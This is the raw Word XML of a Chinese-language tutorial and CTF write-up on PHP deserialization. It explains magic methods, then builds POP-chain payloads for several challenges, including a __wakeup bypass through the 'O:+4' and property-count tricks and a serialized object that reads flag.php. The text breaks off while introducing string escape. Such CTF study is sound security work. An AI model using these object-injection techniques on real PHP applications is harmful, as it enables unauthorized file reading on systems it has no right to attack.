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2964" w14:textId="2E02179E" w:rsidR="00DC15CF" w:rsidRDefault="00DC15CF" w:rsidP="00DC15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一、序列化与反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F7F18" w14:textId="2150D7AD" w:rsidR="005A45A3" w:rsidRDefault="00DC15CF" w:rsidP="00DC15C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C15CF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输，比如跨脚本等。而PHP反序列化是将序列化之后的字节流还原成对象、字符、数组等。但是PHP序列化是不会保存对象的方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC15CF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>形象化理解就像物流的过程。你想把一张桌子通过从</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC15CF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a–&gt;b，一张桌子肯定不好运输，因此需要把它拆开（这个拆的过程就是序列化）；等到达了b需要把他组装起来（装的过程就是反序列化）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356EC211" w14:textId="749A4434" w:rsidR="00DC15CF" w:rsidRDefault="00DC15CF" w:rsidP="00DC15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二、PHP反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74681739" w14:textId="0D815E65" w:rsidR="0024133F" w:rsidRPr="0024133F" w:rsidRDefault="00343E55" w:rsidP="002413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PHP类中有一种特殊函数体的存在叫魔法函数，magic函数命名是以符号__开头的，比如 __construct, __destruct, __toString, __sleep, __wakeup等等。</w:t>
      </w:r>
      <w:r w:rsidR="0024133F" w:rsidRPr="0024133F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这些函数在某些情况下会自动调用，比如</w:t>
      </w:r>
      <w:r w:rsidR="0024133F" w:rsidRPr="0024133F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__construct当一个对象创建时被调用，__destruct当一个对象销毁时被调用，__toString当一个对象被当作一个字符串使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5811AB" w14:textId="584FEE9A" w:rsidR="0024133F" w:rsidRDefault="0024133F" w:rsidP="002413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4133F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>而在反序列化时，如果反序列化对象中存在魔法函数，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0024133F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unserialize()函数同时也会触发。这样，一旦我们能够控制unserialize()入口，那么就可能引发对象注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E5F675" w14:textId="05A7F720" w:rsid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例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024D99A3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__sleep() //使用serialize时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760BC353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__destruct() //对象被销毁时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C514170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__call() //在对象上下文中调用不可访问的方法时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14484107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__callStatic() //在静态上下文中调用不可访问的方法时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F36D21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__get() //用于从不可访问的属性读取数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE5EAF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__set() //用于将数据写入不可访问的属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F73354B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__isset() //在不可访问的属性上调用isset()或empty()触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D0504B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__unset() //在不可访问的属性上使用unset()时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA5231D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__toString() //把类当作字符串使用时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40EF86" w14:textId="77777777" w:rsidR="00343E55" w:rsidRPr="00343E55" w:rsidRDefault="00343E55" w:rsidP="00343E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3E55">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__invoke() //当脚本尝试将对象调用为函数时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9FC480" w14:textId="12423287" w:rsidR="00F2217C" w:rsidRDefault="00DC0E7F" w:rsidP="00DC0E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三、实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D80F407" w14:textId="08BE2892" w:rsidR="00F2217C" w:rsidRDefault="00F2217C" w:rsidP="00DC0E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</w:p>
    <w:p w14:paraId="0227152D" w14:textId="6FE5B2D1" w:rsidR="00F2217C" w:rsidRDefault="00F2217C" w:rsidP="00DC0E7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A96325" wp14:editId="564D55E9">
            <wp:extent cx="5266667" cy="7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0907" w14:textId="7CDFB10C" w:rsidR="008F5452" w:rsidRDefault="00F2217C" w:rsidP="00DC0E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首先找到输出flag处，在Read</w:t>
      </w:r>
      <w:r w:rsidR="006F0235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invoke(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函数。想要触发</w:t>
      </w:r>
      <w:r w:rsidR="00D74F04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>invoke函数需要将一个对象调用为函数，很明显是在Test</w:t>
      </w:r>
      <w:r w:rsidR="006F0235">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="00D74F04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的_</w:t>
      </w:r>
      <w:r w:rsidR="00D74F04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r w:rsidR="00D74F04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数处。想要触发get函数，就要访问不存在的属性，很明显是Show中</w:t>
      </w:r>
      <w:r w:rsidR="006F0235">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00D74F04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_toString</w:t>
      </w:r>
      <w:r w:rsidR="00D74F04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00D74F04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="006F0235">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008F5452">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接下来就是开始构造pop链：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A1130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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37222D43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lastRenderedPageBreak/>
        <w:t>class Read{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352F407A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 xml:space="preserve">    public $token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C959B1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 xml:space="preserve">    public $token_flag;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7782BF2D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 xml:space="preserve">    function __construct(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED267E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 xml:space="preserve">        $this-&gt;token = &amp;$this-&gt;token_flag; //引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEAA76F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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E262A4F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4932027F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class Show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E96AE43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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A7F7F1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 xml:space="preserve">    public $source;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF837C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 xml:space="preserve">    public $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9881D5" w14:textId="556714BE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9B89F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class Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC8980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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6863AFE4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 xml:space="preserve">    public $params;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FA71A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1A169D" w14:textId="70FDD87D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$p3 = new Read();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E253B6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$p2 = new Test();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C0C90B" w14:textId="7F72C509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$p2-&gt;params = $p3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED67C4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$p4 = new Show();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F555953" w14:textId="53F1D485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$p4-&gt;str = array('str'=&gt;$p2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5850751B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$exp = new Show();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9703E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$exp-&gt;source = $p4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADA537" w14:textId="48C54B98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echo serialize($exp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA806DF" w14:textId="77777777" w:rsidR="0048195C" w:rsidRPr="0048195C" w:rsidRDefault="0048195C" w:rsidP="0048195C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048195C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C98107F" w14:textId="6E939510" w:rsidR="008F5452" w:rsidRDefault="008F5452" w:rsidP="0048195C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECA7110" w14:textId="7BA9DF70" w:rsidR="0048195C" w:rsidRDefault="0048195C" w:rsidP="004819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F0526D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防世界 </w:t>
      </w:r>
      <w:r w:rsidR="00F0526D" w:rsidRPr="00F0526D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web_php_unserialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEDC9B8" w14:textId="46FBDB33" w:rsidR="00F0526D" w:rsidRDefault="00F0526D" w:rsidP="0048195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DB085" wp14:editId="2BE9E4D0">
            <wp:extent cx="5133333" cy="4809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12FC" w14:textId="53CEC4FC" w:rsidR="00F0526D" w:rsidRDefault="00F0526D" w:rsidP="004819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还是先找输出flag的地方，发现只有在D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>emo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>类的_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>destruct()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数处有输出点，无疑要将输出的$this-&gt;file的值变为fl4g.php</w:t>
      </w:r>
      <w:r w:rsidR="005817B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，到这里思路已经很清晰了：先对Demo类序列化，base64加密后get传参到var就行了。</w:t>
      </w:r>
      <w:r w:rsidR="004A1F8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中还有一点要注意的就是执行反序列化时会自动调用wakeup函数从而将file的值重置为index</w:t>
      </w:r>
      <w:r w:rsidR="004A1F8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004A1F8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php，所以这里要绕过wakeup函数。（</w:t>
      </w:r>
      <w:r w:rsidR="004A1F8D" w:rsidRPr="004A1F8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>当成员属性数目大于实际数目时可绕过</w:t>
      </w:r>
      <w:r w:rsidR="004A1F8D" w:rsidRPr="004A1F8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wakeup方法，正则匹配可以用+号来进行绕过。</w:t>
      </w:r>
      <w:r w:rsidR="004A1F8D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E67EBD6" w14:textId="63F06BC6" w:rsidR="003859CA" w:rsidRDefault="003859CA" w:rsidP="004819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ayload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7CF77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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCED3D6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class Demo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A176C8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private $file = 'index.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1556BFC9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//protected $file1 = 'index.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C082F6D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public function __construct($file) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21104549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 xml:space="preserve">    $this-&gt;file = $file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083ECF73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 xml:space="preserve">    //$this-&gt;file1 = $file1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA91EA7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F09EF7E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function __destruct() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B35944F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 xml:space="preserve">    echo @highlight_file($this-&gt;file, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418764E1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0235DED6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function __wakeup() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B27C13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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if ($this-&gt;file != 'index.php') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454ED7EB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 xml:space="preserve">        //the secret is in the fl4g.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE3C3E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 xml:space="preserve">        $this-&gt;file = 'index.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291A099D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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EFA5DF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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB540D" w14:textId="77777777" w:rsidR="003859CA" w:rsidRPr="003859CA" w:rsidRDefault="003859CA" w:rsidP="003859CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003859CA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB42360" w14:textId="26D06075" w:rsidR="00B752F9" w:rsidRDefault="00B752F9" w:rsidP="003859CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B752F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$a=new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752F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Demo('fl4g.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57384E43" w14:textId="77777777" w:rsidR="00B752F9" w:rsidRDefault="00B752F9" w:rsidP="003859CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B752F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$b=serialize($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E26A11" w14:textId="77777777" w:rsidR="00B752F9" w:rsidRDefault="00B752F9" w:rsidP="003859CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B752F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$b=str_replace('O:4','O:+4',$b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B473BDC" w14:textId="77777777" w:rsidR="00B752F9" w:rsidRDefault="00B752F9" w:rsidP="003859CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B752F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$b=str_replace('1:{','2:{',$b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45490561" w14:textId="070BD06B" w:rsidR="003859CA" w:rsidRDefault="00B752F9" w:rsidP="003859CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B752F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo base64_encode($b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B91801" w14:textId="231133F5" w:rsidR="00A77DD4" w:rsidRDefault="00A77DD4" w:rsidP="003859C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E119882" wp14:editId="4728BE68">
            <wp:extent cx="5274310" cy="16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1478" w14:textId="6DF73B5F" w:rsidR="00B752F9" w:rsidRDefault="00B752F9" w:rsidP="003859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3、安恒月赛</w:t>
      </w:r>
      <w:r w:rsidRPr="00B752F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2020年DASCTF——四月春季战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B752F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ezunserialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD9024" w14:textId="65CC2732" w:rsidR="00B752F9" w:rsidRDefault="00B752F9" w:rsidP="003859C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793BD3" wp14:editId="0271E0DD">
            <wp:extent cx="5274310" cy="5168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89BF" w14:textId="43F99139" w:rsidR="00B752F9" w:rsidRDefault="008A55F7" w:rsidP="003859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显然flag通过C类的file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_get-contents()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数输出，且注意到在B类存在字符串拼接，所以这里将b转换成c类的对象就会触发toString函数</w:t>
      </w:r>
      <w:r w:rsidR="00043D2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。但是这里只实例化了A类，所以要将A的属性实例化为B类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58451B83" w14:textId="114CB616" w:rsidR="00043D2F" w:rsidRDefault="00043D2F" w:rsidP="003859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POP链构造完成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CCF09C" w14:textId="77777777" w:rsidR="00043D2F" w:rsidRP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$a = new A();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1537481F" w14:textId="77777777" w:rsidR="00043D2F" w:rsidRP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$b = new B();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D690A0" w14:textId="77777777" w:rsidR="00043D2F" w:rsidRP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$c = new C();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367708EA" w14:textId="77777777" w:rsidR="00043D2F" w:rsidRP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$c-&gt;c = "flag.php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DDB18" w14:textId="77777777" w:rsidR="00043D2F" w:rsidRP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$b-&gt;b = $c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EAD247" w14:textId="77777777" w:rsidR="00043D2F" w:rsidRP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$a-&gt;username = "1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91CE3B" w14:textId="77777777" w:rsidR="00043D2F" w:rsidRP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$a-&gt;password = $b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F22B41" w14:textId="58BF4B72" w:rsid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echo serialize($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D34E34" w14:textId="77777777" w:rsidR="00043D2F" w:rsidRDefault="00043D2F" w:rsidP="00043D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得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE439C" w14:textId="7A6BF422" w:rsidR="00043D2F" w:rsidRDefault="00043D2F" w:rsidP="00043D2F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00043D2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O:1:"A":2:{s:8:"username";s:1:"1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A81B4FD" w14:textId="75672D9F" w:rsidR="00043D2F" w:rsidRDefault="00043D2F" w:rsidP="00043D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接下来还有字符逃逸的问题</w:t>
      </w:r>
      <w:r w:rsidR="006F4352">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706051CC" w14:textId="77777777" w:rsidR="006F4352" w:rsidRPr="006F4352" w:rsidRDefault="006F4352" w:rsidP="006F4352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4352">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心思想：过滤导致的字符串位数增加或减少，不会导致序列化中变量名字符数</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4352">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
